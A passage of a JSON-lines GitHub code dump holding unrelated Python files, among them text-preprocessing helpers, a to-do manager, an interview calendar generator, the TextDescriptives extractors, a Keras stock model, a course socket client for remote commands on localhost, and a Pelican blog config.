'.join(lemm_tokens)\n\n# Remove numbers from text\ndef remove_numbers(text):\n \n clean = re.compile('[0-9]')\n return re.sub(clean, '', text)\n\n# Text to lowercase, for stopwords and stuff\ndef do_lowercase(text): \n return text.lower()\n\n# Preprocess Descriptions\ndef preprocessDescriptionGcata(description):\n\n # Apply all the steps\n description = remove_html(description)\n description = remove_non_ascii(description)\n description = remove_punctuation(description)\n description = do_lowercase(description)\n description = remove_numbers(description)\n description = remove_stopwords(description)\n description = remove_non_english(description)\n description = apply_lemmatization(description)\n\n return description\n","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/Trustworthy-Software~DifuzerPlusPlus/difuzerUtils.py","file_name":"difuzerUtils.py","file_ext":"py","file_size_in_byte":9695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34196333054","text":"##To do list: Develop a program that allows the user to manage their tasks by adding,removing, and displaying them.\n\ntasks = [1, 23, 54, 78, 987]\n\ndef add_task():\n task = int(input(\"Enter the task to add: \"))\n tasks.append(task)\n print(\"Task added successfully!\")\ndef remove_task():\n if not tasks:\n print(\"No tasks to remove.\")\n return\n print(\"Current tasks:\")\n \n for i, task in enumerate(tasks, start=1):\n print(f\"{i}. {task}\")\n\n try:\n index = int(input(\"Enter the task number to remove: \")) - 1\n if 0 <= index < len(tasks):\n removed_task = tasks.pop(index)\n print(f\"Removed: {removed_task}\")\n else:\n print(\"Invalid task number.\")\n except ValueError:\n print(\"Invalid input. Please enter a number.\")\n\ndef display_tasks():\n if not tasks:\n print(\"No tasks added yet.\")\n return\n print(\"Tasks:\")\n for i, task in enumerate(tasks, start=1):\n print(f\"{i}. {task}\")\ndef main():\n while True:\n print(\"\\n===== To-Do List Manager =====\")\n print(\"1. Add Task\")\n print(\"2. Remove Task\")\n print(\"3. Display Tasks\")\n print(\"4. Exit\")\n\n choice = input(\"Enter your choice (1/2/3/4): \")\n\n if choice == '1':\n add_task()\n elif choice == '2':\n remove_task()\n elif choice == '3':\n display_tasks()\n elif choice == '4':\n print(\"Exiting the program. Goodbye!\")\n break\n else:\n print(\"Invalid choice. Please try again.\")\nif __name__ == \"__main__\":\n main()\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"KishoreM54/sightspectrum","sub_path":"mini_project3/mini project3.py","file_name":"mini project3.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74485781595","text":"import sys,os\nimport traceback\nROOT_DIR = 'C:\\\\Users\\\\j16492\\\\PycharmProjects\\\\Scripts'\nimport logging\nlogger = logging.getLogger('ICS')\nlogger.setLevel(logging.DEBUG)\nwhile logger.hasHandlers():\n for i in logger.handlers:\n logger.removeHandler(i)\nformatter = logging.Formatter('[%(asctime)s][%(levelname)s] %(message)s')\nfh = logging.FileHandler(filename=ROOT_DIR + '\\\\doc\\\\ics\\\\ics.log', encoding='utf-8', mode='w')\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\nimport threading\nimport xlwings as xw\nfrom icalendar import Calendar, Event\nfrom datetime import datetime, timedelta\nimport re, json, uuid, pytz\nsys.path.append(ROOT_DIR)\nfrom npl.TimeNormalizer import TimeNormalizer\nfrom doc.ics.InviteEmail import Invitor\nfrom doc.ics.RefuseEmail import Rejecter\nfrom doc.ics.Constants import *\n\nEXCEL_DIR = \"E:\\\\OutlookAttachments\\\\\"\nCOLON = \":\"\nTIMEZONE = pytz.timezone(\"Asia/Shanghai\")\nNOW = datetime.now(tz=TIMEZONE)\nCOLUMN_START = \"A\"\nCOLUMN_END = \"Q\"\nCOLUMN_NAME_ROW = 1\nKEY_COLUMN = \"C\"\nFILENAME_PATTERN = \".*招聘汇总\\-杭州.*\\.xlsx\"\nDEPARTMENT_SEERANALYZER = \"智能引擎\"\n\n\nclass InterviewICSGenerator:\n sheet = None\n columnNames = []\n interviews = []\n calendar = Calendar()\n invitor = Invitor()\n rejector = Rejecter()\n\n def __init__(self):\n logger.info(\"new instance\")\n self.calendar.add(\"x-wr-calname\", \"面试日程\")\n self._load_interviews()\n logger.info(\"interviews loaded\")\n\n def _load_interviews(self):\n for filename in os.listdir(EXCEL_DIR):\n if re.match(FILENAME_PATTERN, filename):\n self.sheet = xw.Book(EXCEL_DIR + filename).sheets[0]\n if not self.sheet:\n logger.warning(\"未找到招聘汇总EXCEL表格\")\n sys.exit(0)\n self.columnNames = self.sheet.range(\n COLUMN_START + str(COLUMN_NAME_ROW) + COLON + COLUMN_END + str(COLUMN_NAME_ROW)).value\n row = COLUMN_NAME_ROW + 1\n while self.sheet.range(KEY_COLUMN + str(row)).value:\n interview = {}\n for i in range(len(self.columnNames)):\n interview[self.columnNames[i]] = \\\n self.sheet.range(COLUMN_START + str(row) + COLON + COLUMN_END + str(row)).value[i]\n if DEPARTMENT_SEERANALYZER in interview.get(DEPARTMENT):\n self.interviews.append(interview)\n row += 1\n\n def _format_date(self, match):\n lent = len([word for word in re.split(r\"[./\\-年月]\", match.group()) if word])\n text = match.group()\n if lent == 3:\n text = re.sub(\"[./\\-年]\", \"年\", text, count=1)\n text = re.sub(\"[./\\-月]\", \"月\", text, count=1)\n elif lent == 2:\n text = re.sub(\"[./\\-月]\", \"月\",text, count=1)\n if not re.search(\"[日号]$\", text):\n text = text + \"日\"\n return text\n\n def _parse_time(self, timeSlot, interview):\n if isinstance(timeSlot, datetime):\n return timeSlot.strftime(\"%Y-%m-%d %H:%M:%S\")\n slotStripped = re.sub(\"[这本]?下*个?(星期|周|礼拜)[一二三四五六日]\", \"\", timeSlot)\n slotFormated = re.sub(\n \"((20)?[1-2][0-9][./\\-年])?((10|11|12)|(0?[1-9]))[./\\-月](([12][0-9])|(30|31)|(0?[1-9]))[日号]?\",\n self._format_date, slotStripped)\n slotReserved = re.sub(\"[`~!@#$%^&*()_+=|{}';,\\[\\].<>?!¥…()/《》【】‘;”“’。,、?]\", \" \", slotFormated)\n timestamp = TimeNormalizer().parse(target=slotReserved,\n timeBase=NOW.replace(month=1, day=1, hour=0, second=0,\n microsecond=0).strftime(\"%Y-%m-%d %H:%M:%S\"))\n err = eval(timestamp).get(\"error\")\n if err:\n logger.error(err + \" \" + str(interview))\n return None\n return eval(timestamp).get(\"timestamp\") or eval(timestamp).get(\"timespan\")[0]\n def generate_ics(self):\n interview = \"not initialized\"\n timestamp = \"not initialized\"\n try:\n inviteThreads = []\n refuseThreads = []\n for interview in self.interviews:\n #编辑时间\n slotOriginal = interview.get(RESERVED_SLOT)\n parsedTime = self._parse_time(slotOriginal, interview)\n if not parsedTime:\n continue\n dtstart = TIMEZONE.localize(datetime.strptime(parsedTime, \"%Y-%m-%d %H:%M:%S\")).astimezone(tz=pytz.utc)\n dtend = dtstart + timedelta(hours=2)\n #编辑基本信息\n location = interview.pop(LOCATION)\n location = location if location else \"杭州\"\n interview[LOCATION.split(\"\\n\")[0]] = location\n interview[MOBILE] = int(interview[MOBILE])\n description = json.dumps(interview, indent=0, sort_keys=True, ensure_ascii=False)\n description = re.sub(\"[\\\"{},]\", \"\", description)\n summary = interview.get(NAME) + \" \" + interview.get(UNIVERSITY)\n inviteThread = threading.Thread(target=self.invitor.sendInvitation, args=(interview,))\n inviteThread.setDaemon(True)\n inviteThread.start()\n inviteThreads.append(inviteThread)\n refuseThread = threading.Thread(target=self.rejector.sendRejection, args=(interview,))\n refuseThread.setDaemon(True)\n refuseThread.start()\n refuseThreads.append(refuseThread)\n #新建事件\n event = Event()\n event.add(\"uid\", \"%s:%s:%s\" % (dtstart.timestamp(), interview.get(MOBILE), uuid.uuid4()))\n event.add(\"summary\", summary)\n event[\"dtstart\"] = dtstart.strftime(\"%Y%m%dT%H%M%SZ\")\n event[\"dtend\"] = dtend.strftime(\"%Y%m%dT%H%M%SZ\")\n event.add(\"description\", description)\n event.add(\"location\", location)\n self.calendar.add_component(event)\n logger.info(\"%s %s %s -> %s\" % (\n interview.get(DEPARTMENT), interview.get(NAME), slotOriginal, dtstart))\n for inviteThread in inviteThreads:\n inviteThread.join()\n for refuseThread in refuseThreads:\n refuseThread.join()\n with open(ROOT_DIR + '\\\\doc\\\\ics\\\\interview.ics', 'wb') as f:\n f.write(self.calendar.to_ical())\n f.close()\n except Exception as err:\n logger.error(str(err) + str(traceback.print_exc() or \" \"))\n logger.error(\"Interview: \"+str(interview))\n logger.error(\"Time: \"+str(timestamp))\n\n finally:\n if xw.apps.active:\n xw.apps.active.quit()\n\n def report_result(self):\n for interview in self.interviews:\n to = interview.get(EMAIL)\n candidate_name = interview.get(NAME)\n with self.invitor.getLock():\n with open(\"invitedlist\", \"r\") as f:\n invitedlist = f.read()\n if MARKED == interview.get(INVITEMAIL) and to not in invitedlist:\n self.invitor.addFailed(candidate_name + ' ' + to)\n with self.rejector.getLock():\n with open(\"refusedlist\", \"r\") as f:\n refusedlist = f.read()\n if MARKED == interview.get(REFUSEMAIL) and to not in refusedlist:\n self.rejector.addFailed(candidate_name + ' ' + to)\n logger.info(\"Invite succeed: %s, failed: %s\" % (len(self.invitor.getSent()), len(self.invitor.getFailed())))\n logger.info(\"Refuse succeed: %s, failed: %s\" % (len(self.rejector.getSent()), len(self.rejector.getFailed())))\n if self.invitor.getFailed():\n logger.info(\"Failed invitations:\")\n for i in self.invitor.getFailed():\n logger.info(i)\n if self.rejector.getFailed():\n logger.info(\"Failed rejections:\")\n for i in self.rejector.getFailed():\n logger.info(i)\n\n\nif __name__ == \"__main__\":\n try:\n x = InterviewICSGenerator()\n x.generate_ics()\n x.report_result()\n except Exception as err:\n logger.error(str(err) + str(traceback.print_exc() or \" \"))\n finally:\n if xw.apps.active:\n xw.apps.active.quit()\n","repo_name":"VilianLee/Scripts","sub_path":"doc/ics/InterviewICSGenerator.py","file_name":"InterviewICSGenerator.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13722517010","text":"\"\"\" Extract metrics as Pandas DataFrame.\"\"\"\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport pandas as pd\nfrom spacy.tokens import Doc\nfrom wasabi import msg\n\nfrom textdescriptives.utils import (\n _create_spacy_pipeline,\n _remove_textdescriptives_extensions,\n get_valid_metrics,\n)\n\n\ndef __get_quality(doc: Doc) -> dict:\n \"\"\"Get quality metrics as well as boolean indicator for passing filters.\"\"\"\n return doc._.quality.to_flat_value_dict()\n\n\ndef __get_descriptive_stats_dict(doc: Doc) -> dict:\n \"\"\"Get descriptive statistics as dictionary.\"\"\"\n return {\n **doc._.token_length,\n **doc._.sentence_length,\n **doc._.syllables,\n **doc._.counts,\n }\n\n\ndef extract_dict(\n docs: Union[Iterable[Doc], Doc],\n metrics: Union[List[str], str, None] = None,\n include_text: bool = True,\n) -> List[Dict[str, Any]]:\n \"\"\"Extract calculated metrics from a spaCy Doc or an iterable of Docs to a\n list of dictionaries.\n\n Args:\n docs (Union[Iterable[Doc], Doc]): An iterable of spaCy Docs or a single Doc\n metrics (Union[list[str], str, None], optional): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. Defaults to None in which case it will\n extract metrics for which a pipeline compoenent has been set.\n include_text (bool, optional): Whether to add an entry containing the text.\n Defaults to True.\n\n Returns:\n List[Dict[str, Any]]: List of dictionaries for each Doc with extracted metrics.\n \"\"\"\n if not isinstance(docs, Doc):\n return [extract_dict(doc, metrics, include_text)[0] for doc in docs]\n\n # extract textdescriptive metrics from the list of spacy Language factory\n valid_metrics = get_valid_metrics()\n\n if isinstance(metrics, str):\n metrics = [metrics]\n\n if metrics is None:\n metrics = [\n component for component in valid_metrics if docs.has_extension(component)\n ]\n\n if not set(metrics).issubset(valid_metrics):\n raise ValueError(\n \"'metrics' contained invalid metric.\\n\"\n + f\"Valid metrics are: {valid_metrics}\",\n )\n extracted_metrics: Dict[str, Any] = {}\n if include_text:\n extracted_metrics[\"text\"] = docs.text\n for component in metrics:\n if component == \"quality\":\n metric = __get_quality(docs)\n elif component == \"descriptive_stats\":\n metric = __get_descriptive_stats_dict(docs)\n else:\n metric = getattr(docs._, component)\n if metric:\n extracted_metrics.update(metric)\n\n return [extracted_metrics]\n\n\ndef extract_df(\n docs: Union[Iterable[Doc], Doc],\n metrics: Union[List[str], str, None] = None,\n include_text: bool = True,\n) -> pd.DataFrame:\n \"\"\"Extract calculated metrics from a spaCy Doc object or a generator of Docs\n from nlp.pipe to a Pandas DataFrame.\n\n Args:\n docs (Union[Iterable[Doc], Doc]): An iterable of spaCy Docs or a single Doc\n metrics (Union[list[str], str], optional): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. Defaults to None in which\n case it will extract metrics for which a pipeline compoenent has been\n set.\n include_text (bool, optional): Whether to add a column containing the text.\n Defaults to True.\n\n Returns:\n pd.DataFrame: DataFrame with a row for each doc and column for each metric.\n \"\"\"\n return pd.DataFrame(extract_dict(docs, metrics, include_text))\n\n\ndef extract_metrics(\n text: Union[str, List[str]],\n lang: Optional[str] = None,\n metrics: Optional[Iterable[str]] = None,\n spacy_model: Optional[str] = None,\n spacy_model_size: str = \"lg\",\n) -> pd.DataFrame:\n \"\"\"Extract metrics from a text or a list of texts to a Pandas dataframe.\n\n Args:\n text (Union[str, List[str]]): A text or a list of texts.\n lang (str, optional): Language of the text. If lang is set and no spacy\n model is provided, will automatically download and use a spacy\n model for the language. Defaults to None.\n metrics (List[str]): Which metrics to extract.\n One or more of [\"descriptive_stats\", \"readability\",\n \"dependency_distance\", \"pos_proportions\", \"coherence\", \"quality\",\n \"information_theory\"]. If None, will extract all metrics from\n textdescriptives. Defaults to None.\n spacy_model (str, optional): The spacy model to use. If not set,\n will download one based on lang. Defaults to None.\n spacy_model_size (str, optional): Size of the spacy model to download.\n\n Returns:\n pd.DataFrame: DataFrame with a row for each text and column for each metric.\n \"\"\"\n if isinstance(metrics, str):\n metrics = [metrics]\n\n if spacy_model is None and lang is None:\n raise ValueError(\"Either a spacy model or a language must be provided.\")\n\n if spacy_model is not None and lang is not None:\n msg.info(\n \"Both a spacy model and a language were provided. \"\n + \"Will use the spacy model and ignore language.\",\n )\n\n if metrics is None:\n metrics = get_valid_metrics()\n\n # remove previously set metrics to avoid conflicts\n _remove_textdescriptives_extensions()\n\n # load spacy model if any component requires it\n nlp = _create_spacy_pipeline(\n spacy_model=spacy_model,\n lang=lang,\n metrics=metrics,\n spacy_model_size=spacy_model_size,\n )\n\n # add pipeline components\n if \"all\" in metrics:\n nlp.add_pipe(\"textdescriptives/all\")\n else:\n for component in metrics:\n nlp.add_pipe(f\"textdescriptives/{component}\")\n\n if isinstance(text, str):\n text = [text]\n docs = nlp.pipe(text)\n\n return extract_df(docs)\n","repo_name":"HLasse/TextDescriptives","sub_path":"src/textdescriptives/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"50"} +{"seq_id":"37651223794","text":"from collections import Counter, defaultdict\nfrom typing import List\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n counter1 = Counter(p)\n counter = defaultdict(int)\n l=0\n r=0\n res = []\n while r < len(s):\n counter[s[r]] = 1 + counter.get(s[r], 0)\n \n if r - l + 1== len(p):\n if counter1 == counter:\n res.append(l)\n counter[s[l]] -= 1\n if counter[s[l]] == 0:\n del counter[s[l]]\n l += 1\n r += 1\n return res","repo_name":"AmanuelAbel/A2SV-competitive-programming","sub_path":"find-all-anagrams-in-a-string.py","file_name":"find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10965328959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 11:25:50 2019\n\n@author: hicaro\n\"\"\"\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import losses\nfrom keras.optimizers import SGD\nfrom keras import initializers\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import StandardScaler\nfrom bot import getDados\n\n\nclass PMC:\n\n result = None\n queda = False\n\n def __init__(self):\n\n dd = getDados()\n\n #coleta de dados\n dataset = np.loadtxt('vale.csv', delimiter = ',')\n\n #np.savetxt(\"/home/hicaro/Área de Trabalho/Projeto PMC/resultados.csv\", dataset, delimiter=\",\")\n #print(dataset)\n #separação dos dados em amostras(x) e saida desejada(y) \n #dados = dataset\n scaler = StandardScaler().fit(dataset)\n dataset = scaler.transform(dataset)\n dataset.tofile('dadosbaixados.csv', sep = ',')\n X = dataset[:,1:5]\n Y = dataset[:,0]\n\n #criando o modelo sequencial\n model = Sequential()\n\n model.add(Dense(100,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4),input_dim=4, activation='tanh'))\n model.add(Dense(50,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4), activation='tanh'))\n model.add(Dense(50,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4), activation='tanh'))\n model.add(Dense(1,kernel_initializer=initializers.RandomUniform(minval=-1, maxval=1, seed=4),activation='tanh'))\n # Compile Model\n #compilando o modelo com a função de erro quadratico , algoritmo de otimização\n #gradiente descendente(sgd) com taxa de aprendizado 0.5 e metrica para avaliação a acurácia\n model.compile(loss=losses.mean_squared_error, optimizer=SGD(lr=0.001,momentum=0.0), metrics=[\"accuracy\",\"mse\"])\n # Avaliação do modelo com base no nome da metrica \n\n history = model.fit(X, Y, epochs=6000, batch_size=168,verbose=1)\n scores = model.evaluate(X, Y)\n \n # Making predictions\n # calculate predictions\n predictions = model.predict(X, batch_size=168)\n predictions = (predictions > 0)\n rounded = [round(x[0]) for x in predictions]\n #print(rounded)\n rounded = np.array(rounded)\n dataset = np.column_stack((dataset, rounded))\n \n \n plt.plot(history.history['mean_squared_error'])\n plt.title('Modelo EQM')\n plt.ylabel('mse')\n plt.xlabel('epocas')\n plt.legend(['treinamento','teste'],loc='upper left')\n plt.show() \n \n print(\"\\n%s: %.6f\" % (model.metrics_names[0], scores[0]))\n print(\"\\n%s: %.6f\" % (model.metrics_names[1], scores[1]))\n print(\"\\n%s: %.6f\" % (model.metrics_names[2], scores[2]))\n\n #Fase de operação\n dd.getDados_do_dia()\n\n #coleta de dados\n dataset = np.loadtxt('valetoday.csv', delimiter = ',')\n\n #print(dataset)\n #separação dos dados em amostras(x) e saida desejada(y) \n #dados = dataset\n scaler = StandardScaler().fit(dataset)\n dataset = scaler.transform(dataset)\n entrada = dataset[:,1:5]\n dataset.tofile('dadosreais.csv', sep = ',')\n\n predictions_1 = model.predict(entrada)\n predictions_1.tofile('dadosprevistos.csv', sep = ',')\n predictions = (predictions_1 > 0)\n i = 0\n total = 0\n for prediction in predictions:\n if prediction == True:\n i = i + 1\n total = total + 1\n\n i = round((i/total) * 100,2)\n if i < 50:\n self.queda = True\n i = 100 - i\n self.result = str(i) + \" %\"\n\n def getResult(self):\n return self.result","repo_name":"Josehpequeno/Projeto-PMC","sub_path":"PMC.py","file_name":"PMC.py","file_ext":"py","file_size_in_byte":3814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"24893237052","text":"N = int(input())\ntotalStrLen = 3\nk = 0\nwhile N > totalStrLen:\n totalStrLen = 2 * totalStrLen + k+4\n k += 1\nk += 3\n\ndef dfs(strLen, k, N):\n x = int((strLen - k) / 2)\n if x < N <= x + k:\n N -= x\n if N == 1:\n print('m')\n else:\n print('o')\n return\n\n if x >= N:\n dfs(x, k - 1, N)\n else:\n dfs(x, k - 1, N - (x + k))\n\ndfs(totalStrLen, k, N)\n","repo_name":"AlPomo/AlgorithmReview","sub_path":"Baekjoon/Week05/5904.py","file_name":"5904.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28726443931","text":"cont = 1\nwhile cont <= 10:\n print(cont, '->', end=' ')\n cont += 1\nprint('Acabou')\n\n'''\nExecutando para sempre:\ncont = 1\nwhile True:\n print(cont, '->', end=' ')\n cont += 1\n'''\n# Para quando digitar '999'\n'''\nn = s = 0\nwhile n != 999:\n n = int(input('Digite um número: '))\n s += n\nprint(f'Soma: {s}')\n'''\n\nn = s = 0\nwhile True:\n n = int(input('Digite um número: '))\n if n == 999:\n break\n s += n\nprint(f'Soma: {s}')\n","repo_name":"paulo-emilio/Python-3-Curso-em-Video","sub_path":"Mundo 2/Aula 14 e Aula 15 - Repetição (While)/aula15_a_interrompendo_repeticoes_while.py","file_name":"aula15_a_interrompendo_repeticoes_while.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19758874439","text":"#coding utf-8\n\nimport socket\n\nporta = 17017\nhost = '127.0.0.1'\n\nsocketTCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndest = (host, porta)\n\nsocketTCP.connect(dest)\n\nwhile True:\n print(\"\\nDigite o comando a ser executado: \")\n comando = input()\n socketTCP.send(comando.encode('utf-8'))\n saidaComando = socketTCP.recv(1024).decode()\n print('\\n' + saidaComando)\n\n if comando == 'exit':\n socketTCP.close()\n break\n","repo_name":"jose-de-melo/sistemas_distribuidos_2018","sub_path":"comandos_remotos/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23792916795","text":"import json\n\n\nclass Serializable:\n def __init__(self, *args):\n self.args = args\n\n def serialize(self):\n return json.dumps({\"args\": self.args})\n\n\nclass Point2D(Serializable):\n def __init__(self, x, y):\n super().__init__(x, y)\n self.x = x\n self.y = y\n\n\nclass Deserializable(Serializable):\n @classmethod\n def deserialize(cls, json_data):\n params = json.loads(json_data)\n return cls(*params[\"args\"])\n\n\nclass BetterPoint2D(Deserializable):\n pass\n\n\npoint = Point2D(5, 3)\na = point.serialize()\nb = BetterPoint2D.deserialize(a)\nprint(b)\n","repo_name":"innjuun/Algorithm","sub_path":"LeetCode/medium/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"38897081183","text":"import csv\nimport random\nimport pyfpgrowth\ndef rand (start , end , count ):\n res=[];\n for i in range(count):\n res.append(random.randint(start, end));\n return res;\n\ndef main():\n\n #transactions = [[1, 2, 5],[2, 4],[2, 3],[1, 2, 4],[1, 3],[2, 3],[1, 3],[1, 2, 3, 5],[1, 2, 3]]\n\n tableId=rand(1,100,1000);\n userId1=rand(1,25,500);\n userId2=rand(10,40,500);\n result=[]\n for item in range (1000):\n if (item%3==0):\n result.append(\"w\");\n else:\n result.append(\"l\");\n #with open(\"game_data.csv\", \"w\", newline=\"\") as f:\n # writer = csv.writer(f)\n # writer.writerows(data)\n #tableId = [str(i) for i in tableId];\n #userId1 = [str(i)+\"w\" for i in userId1];\n #userId2 = [str(i)+\"l\" for i in userId2];\n userId=userId1+userId2;\n for item in range(len(userId)):\n if (item%3==0):\n userId[item]=str(userId[item])+result[item]\n else:\n userId[item]=str(userId[item])+result[item]\n data=[[userId[val],tableId[val]] for val in range(1000)];\n transactions =[];\n inner=[]\n for i in range(1,101):\n for j in range(len(data)):\n if data[j][1]==i:\n inner.append(data[j][0]);\n transactions.append(inner);\n inner=[]\n patterns = pyfpgrowth.find_frequent_patterns(transactions, 4);\n for keys,values in patterns.items():\n print(keys,\" \",values )\n\nif __name__ == \"__main__\":\n main();\n","repo_name":"naveen270397/ml","sub_path":"source1.py","file_name":"source1.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39912042399","text":"from tkinter import messagebox as mb\nimport datetime as dt\nfrom Sql import BaseDeDatos\nfrom patrones import patronfecha\n\n\nclass Tiempo:\n def __init__(self, *arg, **kwargs):\n pass\n\n def formato_fecha(self, fecha):\n if patronfecha.match(fecha):\n dia, mes, año = fecha.split(\"/\")\n if int(año) > 68:\n mb.showerror(\"error\", \"fuera de rango de años (hasta 2068\")\n return\n try:\n fecha = dt.datetime.strptime(fecha, \"%d/%m/%y\")\n except:\n mb.showerror(\"error\", \"el mes tiene menos dias\")\n return\n if fecha < dt.datetime.today():\n mb.showerror(\"error\", \"fecha invalida (pasado)\")\n return\n else:\n try:\n dia, mes, año = fecha.split(\"/\")\n except:\n mb.showerror(\"error\", \"usar formato: dd/mm/aa\")\n return\n if int(dia) > 31:\n mb.showerror(\"error\", \"dias maximos: 31\")\n return\n if int(mes) > 12:\n mb.showerror(\"error\", \"meses maximos: 12\")\n return\n if int(año) > 99:\n mb.showerror(\n \"error\", \"ingresar el año solo con sus ultimos dos digitos\"\n )\n return\n año = int(año)\n if año < 10:\n mb.showerror(\"error\", \"fecha invalida (pasado)\")\n return False\n return True\n\n def cerebro(self, treeb):\n hoy = dt.datetime.now().strftime(\"%d/%m/%y\")\n hoy = dt.datetime.strptime(hoy, \"%d/%m/%y\")\n\n con = BaseDeDatos().conexion()\n cursor = con.cursor()\n sql = \"SELECT * FROM productos\"\n text = cursor.execute(sql)\n valores = text.fetchall()\n fechas = []\n for x in valores:\n fecha = x[3]\n fecha = dt.datetime.strptime(fecha, \"%d/%m/%y\")\n delta = fecha - hoy\n if delta < dt.timedelta(weeks=1):\n fechas = [x]\n if fechas:\n mb.showinfo(\"alerta\", \"vencimientos cerca, presentados en pantalla\")\n for x in fechas:\n treeb.insert(\"\", \"end\", text=x[0], values=(x[1], x[2], x[3]))\n else:\n mb.showinfo(\"\", \"no hay vencimientos cercanos\")\n","repo_name":"sumerlost/app-vencimientos","sub_path":"tiempo.py","file_name":"tiempo.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23611438640","text":"import functools\n\nimport plural_ru\n\n\nAUTHOR = \"Андрей Семакин\"\nSITENAME = \"Питонические атаки\"\nSITESUBTITLE = \"Про разработку в целом и про Python в частности\"\nSHOW_SOCIAL_ON_INDEX_PAGE_HEADER = True\nSITEURL = \"\"\nSLUGIFY_SOURCE = \"basename\"\nDEFAULT_DATE_FORMAT = (\"ru_RU\", '%d %B %Y, %a')\n\nPATH = \"content\"\nARTICLE_PATHS = [\"blog\"]\nARTICLE_SAVE_AS = \"{date:%Y}/{date:%m}/{slug}/index.html\"\nARTICLE_URL = \"{date:%Y}/{date:%m}/{slug}/\"\n\nPAGE_PATHS = [\"pages\"]\nPAGE_SAVE_AS = \"pages/{slug}/index.html\"\nPAGE_URL = \"pages/{slug}/\"\nDISPLAY_PAGES_ON_MENU = True\n\nSTATIC_PATHS = [\"static\", \"extra\", \"pages\"]\nEXTRA_PATH_METADATA = {\n \"extra/favicon_16.png\": {\"path\": \"favicon_16.png\"},\n \"extra/favicon_24.png\": {\"path\": \"favicon_24.png\"},\n \"extra/favicon_32.png\": {\"path\": \"favicon_32.png\"},\n \"extra/CNAME\": {\"path\": \"CNAME\"},\n \"extra/.nojekyll\": {\"path\": \".nojekyll\"},\n \"extra/README.md\": {\"path\": \"README.md\"},\n \"extra/robots.txt\": {\"path\": \"robots.txt\"},\n}\n\nDEFAULT_CATEGORY = \"blog\"\nDISPLAY_CATEGORIES_ON_MENU = False\nDEFAULT_METADATA = {\n \"status\": \"draft\",\n}\n\nTIMEZONE = \"Asia/Yekaterinburg\"\n\nDEFAULT_LANG = \"ru\"\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Social widget\nSOCIAL = ((\"rss\", \"/feeds/all.atom.xml\"), (\"telegram\", \"https://t.me/pythonic_attacks\"))\n\n# Menu items\nMENUITEMS = [(\"Тэги\", \"/tags.html\")]\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\nTHEME = \"themes/pelican-clean-blog\"\nCOLOR_SCHEME_CSS = \"monokai.css\"\n\nUTTERANCES_REPO = \"and-semakin/and-semakin.github.io\"\n\nPLUGIN_PATHS = [\"plugins\"]\nPLUGINS = [\"sitemap\", \"filetime_from_git\", \"post_stats\"]\n# disabled plugins:\n# * deadlinks\n\nSITEMAP = {\n \"format\": \"xml\",\n \"priorities\": {\"articles\": 0.5, \"indexes\": 0.5, \"pages\": 0.5},\n \"changefreqs\": {\"articles\": \"monthly\", \"indexes\": \"daily\", \"pages\": \"monthly\"},\n}\n# DEADLINK_VALIDATION = False\n# DEADLINK_OPTS = {\n# \"archive\": True,\n# \"classes\": [],\n# \"labels\": False,\n# \"timeout_duration_ms\": 10000,\n# \"timeout_is_error\": True,\n# }\n\nGIT_FILETIME_FROM_GIT = True\n\nSHOW_READ_TIME = True\nPLURAL_MINUTE = functools.partial(\n plural_ru.ru, quantitative=[\"минута\", \"минуты\", \"минут\"]\n)\n\nDISABLE_CUSTOM_THEME_JAVASCRIPT = False\n\n\ndef 